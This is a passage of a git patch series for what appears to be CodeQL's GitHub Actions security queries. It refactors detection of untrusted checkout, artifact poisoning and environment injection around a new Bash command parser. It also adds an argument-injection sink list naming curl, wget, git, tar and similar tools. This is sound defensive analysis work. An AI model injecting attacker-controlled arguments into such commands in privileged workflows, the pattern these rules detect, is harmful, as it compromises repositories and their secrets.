.github/workflows/untrusted_checkout_5.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:21:9:23:23 | Run Step | +| .github/workflows/untrusted_checkout_6.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:21:9:23:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | #select | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 81a8c63c8822..1d6122b37479 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -18,3 +18,5 @@ | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From c7fde2a40d87ec164b72990980eaf085e38bf8e5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 30 Sep 2024 15:35:00 +0200 Subject: [PATCH 553/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 00d8e21c05df..d79107e06c6f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.59 +version: 0.1.60 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 94468d4b96c8..aeaae6dbb91d 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.59 +version: 0.1.60 groups: [actions, queries] suites: codeql-suites extractor: javascript From 726392c8b7b65f6efadad21c1ef353c7b56d0fea Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Tue, 1 Oct 2024 09:48:16 +0200 Subject: [PATCH 554/707] Suppress `actions/cache-poisoning/code-injection` alerts covered by `actions/code-injection/critical` --- ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql | 3 ++- .../Security/CWE-349/CachePoisoningViaCodeInjection.expected | 1 - 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index 411d0052d4bc..fe49b2dd3b51 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -30,7 +30,8 @@ where check.protects(source.getNode().asExpr(), event, "code-injection") ) and // excluding privileged workflows since they can be exploited in easier circumstances - not job.isPrivileged() and + // which is covered by `actions/code-injection/critical` + not job.isPrivilegedExternallyTriggerable(event) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(event) diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected index d9f659cbcc38..5c5c26edb4e5 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -8,4 +8,3 @@ nodes subpaths #select | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection2.yml:16:21:16:70 | steps.modified_files.outputs.files_modified | ${{ steps.modified_files.outputs.files_modified }} | From ef37e3c59400ff117e577e669a6bb32b5cfd4b7f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 1 Oct 2024 14:22:08 +0200 Subject: [PATCH 555/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d79107e06c6f..af477fb9bf71 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.60 +version: 0.1.61 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index aeaae6dbb91d..7b8b9ef321c2 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.60 +version: 0.1.61 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4b74adec4b7165dc9f10c22dfff791055c3bcedf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:31:59 +0200 Subject: [PATCH 556/707] Account for branches filter as a way to prevent workflow_run to trigger on PRs from forks --- ql/lib/codeql/actions/ast/internal/Ast.qll | 11 ++++------- ql/lib/ext/config/argument_injection_sinks.yml | 7 +++++++ 2 files changed, 11 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d4716f89e191..f2d3698597f1 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -722,13 +722,10 @@ class EventImpl extends AstNodeImpl, TEventNode { not this.getName() = "workflow_run" or this.getName() = "workflow_run" and - // workflow_run cannot be externally triggered if they triggering workflow runs in the context of the default branch - // since an attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow - // but in that case, the triggering workflow will run in the context of the PR head branch - ( - not exists(this.getAPropertyValue("branches")) or - this.getAPropertyValue("branches").matches("%*%") - ) + // workflow_run cannot be externally triggered if the triggering workflow runs in the context of the default branch + // An attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow + // in that case, the triggering workflow will run in the context of the PR head branch + not exists(this.getAPropertyValue("branches")) or // the event is `workflow_call` and there is a caller workflow that can be triggered externally this.getName() = "workflow_call" and diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 4588af0bf00f..ab523c59303c 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -3,7 +3,14 @@ extensions: pack: github/actions-all extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ + # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection data: - ["(awk)(.*?)", 2, 3] + - ["(curl)(.*?)", 2, 3] + - ["(find)(.*?)", 2, 3] + - ["(git)(.*?)", 2, 3] - ["(sed)(.*?)", 2, 3] + - ["(tar)(.*?)", 2, 3] + - ["(wget)(.*?)", 2, 3] + - ["(zip)(.*?)", 2, 3] From 2727bf5e2fdb220f266a0bc90675074c95548d13 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:33:05 +0200 Subject: [PATCH 557/707] Add improved Bash script parser --- ql/lib/codeql/actions/Ast.qll | 4 + ql/lib/codeql/actions/Helper.qll | 100 +++++++++++++++++++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 6 ++ 3 files changed, 104 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 63f2552f5829..a4c50ecf55b6 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -293,6 +293,10 @@ class Run extends Step instanceof RunImpl { Expression getAnScriptExpr() { result = super.getAnScriptExpr() } string getWorkingDirectory() { result = super.getWorkingDirectory() } + + string getACommand() { result = super.getACommand() } + + predicate getAnAssignment(string name, string value) { super.getAnAssignment(name, value) } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index f9fa108ec3a2..d6e3042ead36 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -54,7 +54,6 @@ predicate isBashParameterExpansion(string expr, string parameter, string operato ) } -// TODO, the followinr test fails bindingset[raw_content] predicate extractVariableAndValue(string raw_content, string key, string value) { exists(string regexp, string content | content = trimQuotes(raw_content) | @@ -246,10 +245,6 @@ predicate inNonPrivilegedContext(AstNode node) { not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_) } -string partialFileContentRegexp() { - result = ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] -} - bindingset[snippet] predicate outputsPartialFileContent(string snippet) { // e.g. @@ -257,7 +252,7 @@ predicate outputsPartialFileContent(string snippet) { // echo "FOO=$(> $GITHUB_ENV // yq '.foo' foo.yml >> $GITHUB_PATH // cat foo.txt >> $GITHUB_PATH - snippet.regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + partialFileContentRegexp() + ".*"]) + Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 } string defaultBranchNames() { @@ -310,3 +305,96 @@ string normalizePath(string path) { */ bindingset[subpath, path] predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path } + +module Bash { + string stmtSeparator() { result = ";" } + + string commandSeparator() { result = ["&&", "||"] } + + string pipeSeparator() { result = "|" } + + string splitSeparators() { + result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() + } + + string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + + string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + + bindingset[script] + string getACommand(string script) { + exists(string stmt_, string stmt, string subline2, string cmd | + stmt_ = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n") and + stmt = + [ + // $() command substitution + stmt_ + .regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", _, _) + .regexpReplaceAll("^\\$\\(", "") + .regexpReplaceAll("\\)$", ""), + // `...` command substitution + stmt_ + .regexpFind("\\`[^\\`]+\\`", _, _) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", ""), + // original line with no substitutions + stmt_ + .regexpReplaceAll("\\`[^\\`]+\\`", "SUBCOMMAND") + .regexpReplaceAll("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", "SUBCOMMAND") + ] and + // We shoulg replace quoted arguments with a placeholder to avoid splitting them + // eg: ls | grep -E "*.(tar.gz|zip)$" + //subline2 = subline.regexpReplaceAll("\"([^\"]+)\"", "$0").regexpReplaceAll("'([^']+)'", "$0") and + ( + stmt.regexpMatch(".*\"([^\"]+)\".*") and + exists(int i | + subline2 = + stmt.replaceAll(stmt.regexpFind("\"([^\"]+)\"", _, i), + stmt.regexpFind("\"([^\"]+)\"", _, i) + .replaceAll("|", "::PIPE::") + .replaceAll(";", "::SEMICOLON::") + .replaceAll("&&", "::AND::") + .replaceAll("||", "::OR::")) + ) + or + stmt.regexpMatch(".*'([^']+)'.*") and + exists(int i | + subline2 = + stmt.replaceAll(stmt.regexpFind("'([^']+)'", _, i), + stmt.regexpFind("'([^']+)'", _, i) + .replaceAll("|", "::PIPE::") + .replaceAll(";", "::SEMICOLON::") + .replaceAll("&&", "::AND::") + .replaceAll("||", "::OR::")) + ) + or + not stmt.regexpMatch(".*'([^']+)'.*") and + not stmt.regexpMatch(".*\"([^\"]+)\".*") and + subline2 = stmt + ) and + cmd = subline2.splitAt(splitSeparators()).trim() and + // when splitting the line with a separator that is not found, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not cmd.indexOf(splitSeparators()) > -1 and + not cmd = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", + "case", "esac", "{", "}" + ] and + result = + cmd.replaceAll("::PIPE::", "|") + .replaceAll("::SEMICOLON::", ";") + .replaceAll("::AND::", "&&") + .replaceAll("::OR::", "||") + ) + } + + bindingset[script] + predicate getAnAssignment(string script, string name, string value) { + exists(string stmt | + stmt = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n").trim() and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index f2d3698597f1..5b96781a10b1 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1319,6 +1319,12 @@ class RunImpl extends StepImpl { string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } + string getACommand() { result = Bash::getACommand(this.getScript()) } + + predicate getAnAssignment(string name, string value) { + Bash::getAnAssignment(this.getScript(), name, value) + } + ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } From a5075e52161509c245e0e0390ce4929e189c450f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:33:42 +0200 Subject: [PATCH 558/707] Change queries to use the new bash parser --- .../security/ArgumentInjectionQuery.qll | 14 ++-- .../security/ArtifactPoisoningQuery.qll | 64 ++++++------------- .../codeql/actions/security/ControlChecks.qll | 11 ++-- .../security/EnvPathInjectionQuery.qll | 7 +- .../actions/security/EnvVarInjectionQuery.qll | 7 +- .../security/OutputClobberingQuery.qll | 11 ++-- .../actions/security/PoisonableSteps.qll | 8 +-- .../security/UntrustedCheckoutQuery.qll | 36 +++++------ 8 files changed, 61 insertions(+), 97 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index 37f966668df6..6e1a5c0f2293 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -28,13 +28,13 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { ) or exists( - Run run, string line, string argument, string regexp, int argument_group, int command_group + Run run, string cmd, string argument, string regexp, int argument_group, int command_group | - run.getScript().splitAt("\n") = line and + run.getACommand() = cmd and run.getScriptScalar() = this.asExpr() and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = line.regexpCapture(regexp, argument_group) and - command = line.regexpCapture(regexp, command_group) and + argument = cmd.regexpCapture(regexp, argument_group) and + command = cmd.regexpCapture(regexp, command_group) and argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") ) } @@ -60,12 +60,12 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { source instanceof RemoteFlowSource or exists( - Run run, string argument, string line, string regexp, int command_group, int argument_group + Run run, string argument, string cmd, string regexp, int command_group, int argument_group | run.getScriptScalar() = source.asExpr() and - run.getScript().splitAt("\n") = line and + run.getACommand() = cmd and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and - argument = line.regexpCapture(regexp, argument_group) and + argument = cmd.regexpCapture(regexp, argument_group) and argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") ) } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index ebe22140be24..b70155906143 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -155,71 +155,54 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use } override string getPath() { - if - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) - .getScript() - .splitAt("\n") + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else - if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } } class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { - string script; - GHRunArtifactDownloadStep() { // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - this.getScript() = script and - script.splitAt("\n").regexpMatch(".*gh\\s+run\\s+download.*") and - script.splitAt("\n").matches("%github.event.workflow_run.id%") and + this.getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and + this.getACommand().matches("%github.event.workflow_run.id%") and ( - script.splitAt("\n").regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + this.getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(script - .splitAt("\n") + normalizePath(trimQuotes(this.getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) - .getScript() - .splitAt("\n") + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if - this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or - script.splitAt("\n").regexpMatch(unzipRegexp()) + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) or + this.getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } } class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { - string script; - DirectArtifactDownloadStep() { // eg: // run: | @@ -230,32 +213,25 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { // gh api $url > "$name.zip" // unzip -d "$name" "$name.zip" // done - this.getScript() = script and - script.splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") and + this.getACommand().matches("%github.event.workflow_run.artifacts_url%") and ( - script.splitAt("\n").regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + this.getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(script - .splitAt("\n") + normalizePath(trimQuotes(this.getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) - .getScript() - .splitAt("\n") + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else result = "GITHUB_WORKSPACE/" } diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 134ce780eeed..801ccb6e9868 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -255,10 +255,13 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run { BashCommentVsHeadDateCheck() { - exists(string line | - line = this.getScript().splitAt("\n") and - line.toLowerCase() - .regexpMatch(".*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*") + // eg: if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + exists(string cmd1, string cmd2 | + cmd1 = this.getACommand() and + cmd2 = this.getACommand() and + not cmd1 = cmd2 and + cmd1.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") and + cmd2.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") ) } } diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 40c0c7da9eb9..923d950631d3 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -37,11 +37,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_PATH - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + exists(string var_name, string var_value | + run.getAnAssignment(var_name, var_value) and outputsPartialFileContent(var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 4f54f38f2746..6f325ca4c939 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -42,11 +42,8 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + exists(string var_name, string var_value | + run.getAnAssignment(var_name, var_value) and outputsPartialFileContent(var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 38a8d2b9d0b9..4a488f945b97 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -56,11 +56,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_OUTPUT - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + exists(string var_name, string var_value | + run.getAnAssignment(var_name, var_value) and outputsPartialFileContent(var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") @@ -154,11 +151,11 @@ class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { // A file is read and its content is printed to stdout // - run: echo "foo=$( Date: Wed, 2 Oct 2024 12:34:01 +0200 Subject: [PATCH 559/707] Add new Argument Injection sinks --- ql/lib/ext/config/argument_injection_sinks.yml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index ab523c59303c..95f813131685 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -5,12 +5,12 @@ extensions: # https://gtfobins.github.io/ # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection data: - - ["(awk)(.*?)", 2, 3] - - ["(curl)(.*?)", 2, 3] - - ["(find)(.*?)", 2, 3] - - ["(git)(.*?)", 2, 3] - - ["(sed)(.*?)", 2, 3] - - ["(tar)(.*?)", 2, 3] - - ["(wget)(.*?)", 2, 3] - - ["(zip)(.*?)", 2, 3] + - ["(awk)\\s(.*?)", 2, 3] + - ["(curl)\\s(.*?)", 2, 3] + - ["(find)\\s(.*?)", 2, 3] + - ["(git)\\s(.*?)", 2, 3] + - ["(sed)\\s(.*?)", 2, 3] + - ["(tar)\\s(.*?)", 2, 3] + - ["(wget)\\s(.*?)", 2, 3] + - ["(zip)\\s(.*?)", 2, 3] From 805269683617f8d168234e1f8b646aa432b0830b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:34:10 +0200 Subject: [PATCH 560/707] Add new Poisonable step for bun --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index f79ca795cd09..1543e2d8d459 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -19,6 +19,7 @@ extensions: - ["asv"] - ["awk\\s+-f"] - ["bundle"] + - ["bun"] - ["cargo"] - ["checkov"] - ["eslint"] From 6b98a5b5b16266c360b5116e80d7afce07f60e03 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:34:27 +0200 Subject: [PATCH 561/707] Update tests --- .../.github/workflows/workflow_run_branches5.yml | 13 +++++++++++++ .../Security/CWE-094/CodeInjectionCritical.expected | 3 ++- .../Security/CWE-094/CodeInjectionMedium.expected | 2 ++ .../.github/workflows/artifactpoisoning52.yml | 3 +-- .../.github/workflows/artifactpoisoning53.yml | 2 +- .../CWE-829/ArtifactPoisoningCritical.expected | 12 ++++++------ .../CWE-829/ArtifactPoisoningMedium.expected | 8 ++++---- .../CWE-829/UntrustedCheckoutCritical.expected | 2 +- 8 files changed, 30 insertions(+), 15 deletions(-) create mode 100644 